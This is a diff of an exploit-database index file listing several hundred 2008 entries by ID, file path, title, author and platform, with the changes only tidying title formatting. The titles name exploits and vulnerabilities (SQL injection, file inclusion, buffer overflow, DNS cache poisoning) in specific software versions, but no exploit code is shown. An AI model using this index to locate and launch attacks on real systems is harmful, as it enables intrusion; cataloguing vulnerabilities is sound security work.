Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 +5702,platforms/php/webapps/5702.txt,"Azuresites CMS- Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability",2008-05-31,Lidloses_Auge,php,webapps,0 5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability",2008-05-31,mozi,php,webapps,0 5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability",2008-05-31,JosS,asp,webapps,0 @@ -5345,19 +5345,19 @@ id,file,description,date,author,platform,type,port 5720,platforms/linux/remote/5720.py,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22 5721,platforms/php/webapps/5721.pl,"Joomla Component acctexp <= 0.12.x Blind SQL Injection Exploit",2008-06-02,His0k4,php,webapps,0 5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion Vulnerabilities",2008-06-02,HaiHui,php,webapps,0 -5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL injection Vulnerability",2008-06-02,His0k4,php,webapps,0 +5723,platforms/php/webapps/5723.txt,"Joomla Component equotes 0.9.4 - Remote SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 5724,platforms/php/webapps/5724.txt,"pLog (albumId) Remote SQL Injection Vulnerability",2008-06-02,DreamTurk,php,webapps,0 5725,platforms/php/webapps/5725.txt,"smeweb 1.4b (sql/xss) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0 5727,platforms/windows/dos/5727.pl,"MDaemon <= 9.6.5 - Multiple Remote Buffer Overflow Exploit PoC",2008-06-02,securfrog,windows,dos,0 5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability",2008-06-03,"ilker Kandemir",php,webapps,0 5729,platforms/php/webapps/5729.txt,"Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability",2008-06-03,His0k4,php,webapps,0 -5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog <= b24 Remote SQL Injection Vulnerability",2008-06-03,His0k4,php,webapps,0 +5730,platforms/php/webapps/5730.txt,"Joomla Component iDoBlog <= b24 - Remote SQL Injection Vulnerability",2008-06-03,His0k4,php,webapps,0 5731,platforms/php/webapps/5731.txt,"Battle Blog <= 1.25 (comment.asp) Remote SQL Injection Vulnerability",2008-06-03,Bl@ckbe@rD,php,webapps,0 5732,platforms/windows/remote/5732.html,"C6 Messenger ActiveX Remote Download & Execute Exploit",2008-06-03,Nine:Situations:Group,windows,remote,0 5733,platforms/php/webapps/5733.txt,"quickersite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0 5734,platforms/php/webapps/5734.pl,"Joomla Component JooBlog 0.1.1 - Blind SQL Injection Exploit",2008-06-03,His0k4,php,webapps,0 5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script Code Execution Vulnerability",2008-06-03,JIKO,php,webapps,0 -5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a Blind SQL injection Exploit",2008-06-04,His0k4,php,webapps,0 +5737,platforms/php/webapps/5737.pl,"Joomla Component jotloader <= 1.2.1.a Blind SQL Injection Exploit",2008-06-04,His0k4,php,webapps,0 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 @@ -5368,18 +5368,18 @@ id,file,description,date,author,platform,type,port 5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a (shownews) Remote SQL Injection Vulnerability",2008-06-05,N/A,php,webapps,0 5746,platforms/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BOF Exploit",2008-06-05,shinnai,windows,remote,0 5747,platforms/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK (BITiff.ocx) Remote BOF Exploit (2)",2008-06-05,shinnai,windows,remote,0 -5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL injection Vulnerability",2008-06-05,His0k4,php,webapps,0 +5748,platforms/php/webapps/5748.txt,"Joomla Component JoomlaDate (user) SQL Injection Vulnerability",2008-06-05,His0k4,php,webapps,0 5749,platforms/multiple/dos/5749.pl,"Asterisk (SIP channel driver / in pedantic mode) Remote Crash Exploit",2008-06-05,"Armando Oliveira",multiple,dos,0 5750,platforms/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns",2008-06-05,shinnai,windows,remote,0 5751,platforms/windows/remote/5751.pl,"freeSSHd 1.2.1 - (Post Auth) Remote SEH Overflow Exploit",2008-06-06,ryujin,windows,remote,22 -5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL injection Vulnerability",2008-06-07,His0k4,php,webapps,0 +5752,platforms/php/webapps/5752.pl,"Joomla Component GameQ <= 4.0 - Remote SQL Injection Vulnerability",2008-06-07,His0k4,php,webapps,0 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 (lfi/xss) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability",2008-06-08,MEEKAAH,php,webapps,0 5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability",2008-06-08,ahmadbady,php,webapps,0 -5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability",2008-06-08,StAkeR,php,webapps,0 -5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL injection Vulnerability",2008-06-08,His0k4,php,webapps,0 +5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - XSS / Local File Inclusion Vulnerability",2008-06-08,StAkeR,php,webapps,0 +5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL Injection Vulnerability",2008-06-08,His0k4,php,webapps,0 5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit",2008-06-09,Stack,php,webapps,0 5761,platforms/php/webapps/5761.pl,"iJoomla News Portal (Itemid) Remote SQL Injection Exploit",2008-06-09,"ilker Kandemir",php,webapps,0 5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - (config.php) Local File Inclusion Vulnerability",2008-06-09,Stack,php,webapps,0 @@ -5446,20 +5446,20 @@ id,file,description,date,author,platform,type,port 5823,platforms/php/webapps/5823.txt,"AWBS <= 2.7.1 (news.php viewnews) Remote SQL Injection Vulnerability",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 (change.php) Arbitrary Add Admin Vulnerability",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum <= 1.1.4 - Remote SQL Injection Exploit",2008-06-15,The:Paradox,php,webapps,0 -5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 Remote Stack Overflow Exploit",2008-06-15,Heretic2,windows,remote,4000 +5827,platforms/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow Exploit",2008-06-15,Heretic2,windows,remote,4000 5828,platforms/php/webapps/5828.txt,"Oxygen 2.0 (repquote) Remote SQL Injection Vulnerability",2008-06-15,N/A,php,webapps,0 5829,platforms/php/webapps/5829.txt,"SH-News 3.0 Insecure Cookie Handling Vulnerability",2008-06-15,"Virangar Security",php,webapps,0 5830,platforms/php/webapps/5830.txt,"NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability",2008-06-16,Mr.SQL,php,webapps,0 5831,platforms/php/webapps/5831.txt,"Open Azimyt CMS <= 0.22 (lang) Local File Inclusion Vulnerability",2008-06-16,DSecRG,php,webapps,0 5832,platforms/php/webapps/5832.pl,"MyMarket 1.72 Blind SQL Injection Exploit",2008-06-16,N/A,php,webapps,0 -5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 +5833,platforms/php/webapps/5833.txt,"Joomla Simple Shop Galore Component 3.x - (catid) SQL Injection",2008-06-16,eXeCuTeR,php,webapps,0 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 -5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM exploit",2008-06-17,mu-b,windows,local,0 +5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 (tid) Remote SQL Injection Vulnerability",2008-06-17,SuNHouSe2,php,webapps,0 -5840,platforms/php/webapps/5840.txt,"easyTrade 2.x (detail.php id) Remote SQL Injection Vulnerability",2008-06-17,N/A,php,webapps,0 +5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) Remote SQL Injection Vulnerability",2008-06-17,N/A,php,webapps,0 5841,platforms/php/webapps/5841.txt,"ThaiQuickCart (sLanguage) Local File Inclusion Vulnerability",2008-06-17,"CWH Underground",php,webapps,0 5842,platforms/php/webapps/5842.txt,"PHP Site Lock 2.0 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5843,platforms/windows/dos/5843.html,"P2P Foxy Out of Memory Denial of Service Exploit",2008-06-17,Styxosaurus,windows,dos,0 @@ -5469,7 +5469,7 @@ id,file,description,date,author,platform,type,port 5847,platforms/php/webapps/5847.txt,"WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability",2008-06-17,Cr@zy_King,php,webapps,0 5848,platforms/php/webapps/5848.txt,"traindepot 0.1 (lfi/xss) Multiple Vulnerabilities",2008-06-18,"CWH Underground",php,webapps,0 5849,platforms/asp/webapps/5849.txt,"doITlive CMS <= 2.50 (SQL Injection/XSS) Multiple Vulnerabilities",2008-06-18,BugReport.IR,asp,webapps,0 -5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 Remote File Upload Vulnerability",2008-06-18,Alemin_Krali,php,webapps,0 +5850,platforms/php/webapps/5850.txt,"AspWebCalendar 2008 - Remote File Upload Vulnerability",2008-06-18,Alemin_Krali,php,webapps,0 5851,platforms/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 vb6skit.dll Buffer Overflow PoC",2008-06-18,shinnai,windows,dos,0 5852,platforms/php/webapps/5852.txt,"netBIOS (showNews.php newsid) SQL Injection Vulnerability",2008-06-18,"security fears team",php,webapps,0 5853,platforms/php/webapps/5853.txt,"Maxtrade AIO 1.3.23 (categori) Remote SQL Injection Vulnerability",2008-06-18,HaCkeR_EgY,php,webapps,0 @@ -5488,7 +5488,7 @@ id,file,description,date,author,platform,type,port 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion Vulnerabilities",2008-06-19,Ciph3r,php,webapps,0 5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - (id) Remote SQL Injection Vulnerability",2008-06-19,"Hussin X",php,webapps,0 -5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 +5869,platforms/php/webapps/5869.txt,"virtual support office-xp <= 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5870,platforms/php/webapps/5870.txt,"gl-sh deaf forum <= 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 (index.php page) Local File Inclusion Vulnerability",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 (index.php page) Local File Inclusion Vulnerability",2008-06-20,cOndemned,php,webapps,0 @@ -5569,8 +5569,8 @@ id,file,description,date,author,platform,type,port 5949,platforms/php/webapps/5949.txt,"Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5950,platforms/php/webapps/5950.txt,"Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability",2008-06-26,InjEctOr5,php,webapps,0 5951,platforms/windows/local/5951.c,"XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC",2008-06-26,Shinnok,windows,local,0 -5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 -5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts NMS Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0 +5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 +5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling Vulnerability",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability",2008-06-26,Ciph3r,php,webapps,0 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager cms 24a (lfi/xss) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 @@ -5590,9 +5590,9 @@ id,file,description,date,author,platform,type,port 5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development (products.php) SQL Injection Vulnerability",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 -5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 Multiple Remote SQL Injection Vulnerabilities",2008-06-30,N/A,php,webapps,0 +5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,N/A,php,webapps,0 5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 -5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x (catalogue.php cat) Remote SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 +5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) Remote SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) Remote SQL Injection Vulnerability",2008-06-30,DNX,php,webapps,0 5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery Multiple SQL Injection Vulnerabilities",2008-06-30,AlbaniaN-[H],php,webapps,0 @@ -5624,7 +5624,7 @@ id,file,description,date,author,platform,type,port 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 6008,platforms/php/webapps/6008.php,"ImperialBB <= 2.3.5 - Remote File Upload Exploit",2008-07-05,PHPLizardo,php,webapps,0 -6009,platforms/php/webapps/6009.pl,"fuzzylime cms 3.01 Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 +6009,platforms/php/webapps/6009.pl,"fuzzylime cms 3.01 - Remote Command Execution Exploit",2008-07-05,Ams,php,webapps,0 6010,platforms/php/webapps/6010.txt,"XPOZE Pro 3.06 (uid) Remote SQL Injection Vulnerability",2008-07-06,"HIva Team",php,webapps,0 6011,platforms/php/webapps/6011.txt,"contentnow 1.4.1 (upload/xss) Multiple Vulnerabilities",2008-07-06,"CWH Underground",php,webapps,0 6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 (CMailCOM.dll) Remote SEH Overwrite Exploit",2008-07-06,Nine:Situations:Group,windows,remote,80 @@ -5644,7 +5644,7 @@ id,file,description,date,author,platform,type,port 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script <= 4.0 - Remote SQL Injection Vulnerability",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6029,platforms/multiple/dos/6029.txt,"Multiple Vendors (Firefox/Evince/EOG/Gimp) - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 -6030,platforms/windows/local/6030.py,"Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day",2008-07-08,h07,windows,local,0 +6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - (m3u) Local BOF Exploit (0day)",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) BOF PoC",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres Manzano",linux,local,0 6033,platforms/php/webapps/6033.pl,"AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete Exploit",2008-07-09,k1tk4t,php,webapps,0 @@ -5697,17 +5697,17 @@ id,file,description,date,author,platform,type,port 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload Vulnerability",2008-07-15,"Cold Zero",php,webapps,0 6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-15,Mr.SQL,php,webapps,0 -6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit",2008-07-16,Inphex,php,webapps,0 -6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL injection Vulnerability",2008-07-16,His0k4,php,webapps,0 +6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution Exploit",2008-07-16,Inphex,php,webapps,0 +6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL Injection Vulnerability",2008-07-16,His0k4,php,webapps,0 6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability",2008-07-16,"Hussin X",php,webapps,0 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0 -6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 +6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0 -6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 +6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)",2008-07-17,eliteboy,linux,remote,0 6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 - Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 -6096,platforms/php/webapps/6096.txt,"preCMS 1 - (index.php page) Remote SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 +6096,platforms/php/webapps/6096.txt,"preCMS 1 - (index.php page) Remote SQL Injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability",2008-07-18,Mr.SQL,php,webapps,0 6099,platforms/php/webapps/6099.txt,"Siteframe (folder.php id) Remote SQL Injection Vulnerability",2008-07-18,n0ne,php,webapps,0 @@ -5734,14 +5734,14 @@ id,file,description,date,author,platform,type,port 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0 -6123,platforms/multiple/remote/6123.py,"BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0 +6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6125,platforms/php/webapps/6125.txt,"Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection Vulnerability",2008-07-24,Mr.SQL,php,webapps,0 6126,platforms/php/webapps/6126.txt,"ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability",2008-07-24,Dyshoo,php,webapps,0 6127,platforms/php/webapps/6127.htm,"Wordpress Plugin Download Manager 0.2 - Arbitrary File Upload Exploit",2008-07-24,SaO,php,webapps,0 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a tty panic Remote Denial of Service Vulnerability",2008-07-25,kokanin,minix,dos,0 -6130,platforms/multiple/remote/6130.c,"BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)",2008-07-25,"Marc Bevand",multiple,remote,0 +6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (c)",2008-07-25,"Marc Bevand",multiple,remote,0 6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 (rfi/xss/ig) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability",2008-07-25,nuclear,php,webapps,0 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 (comment.php mid) SQL Injection Vulnerability",2008-07-25,Mr.SQL,php,webapps,0 @@ -5762,7 +5762,7 @@ id,file,description,date,author,platform,type,port 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 (language) Local File Inclusion Vulnerability",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion Vulnerability",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 (language_full) Local File Inclusion Vulnerability",2008-07-28,DSecRG,php,webapps,0 -6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download vulnerability",2008-07-28,DSecRG,windows,remote,0 +6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download Vulnerability",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit",2008-07-28,Elazar,windows,remote,0 6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability",2008-07-28,IRCRASH,php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability",2008-07-28,"GulfTech Security",php,webapps,0 @@ -5811,7 +5811,7 @@ id,file,description,date,author,platform,type,port 6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0 6201,platforms/windows/dos/6201.html,"HydraIrc <= 0.3.164 (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 -6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities",2008-08-04,"Virangar Security",php,webapps,0 +6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 - Multiple Local File Inclusion Vulnerabilities",2008-08-04,"Virangar Security",php,webapps,0 6204,platforms/php/webapps/6204.txt,"Plogger <= 3.0 - Remote SQL Injection Vulnerability",2008-08-05,"GulfTech Security",php,webapps,0 6205,platforms/php/webapps/6205.txt,"iges cms <= 2.0 (xss/sql) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 6206,platforms/php/webapps/6206.txt,"LiteNews <= 0.1 Insecure Cookie Handling Vulnerability",2008-08-05,Scary-Boys,php,webapps,0 @@ -5835,18 +5835,18 @@ id,file,description,date,author,platform,type,port 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0 -6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 +6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0 6231,platforms/php/webapps/6231.txt,"Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability",2008-08-11,IRCRASH,php,webapps,0 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability",2008-08-12,IP-Sh0k,php,webapps,0 -6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability",2008-08-12,d3m0n,php,webapps,0 +6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password Vulnerability",2008-08-12,d3m0n,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 